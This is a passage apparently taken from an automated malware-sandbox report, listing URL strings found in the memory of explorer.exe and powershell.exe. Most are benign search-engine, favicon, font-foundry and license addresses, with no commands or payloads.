Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001F.00000000.545744038.00000000075A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001F.00000002.604333034.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
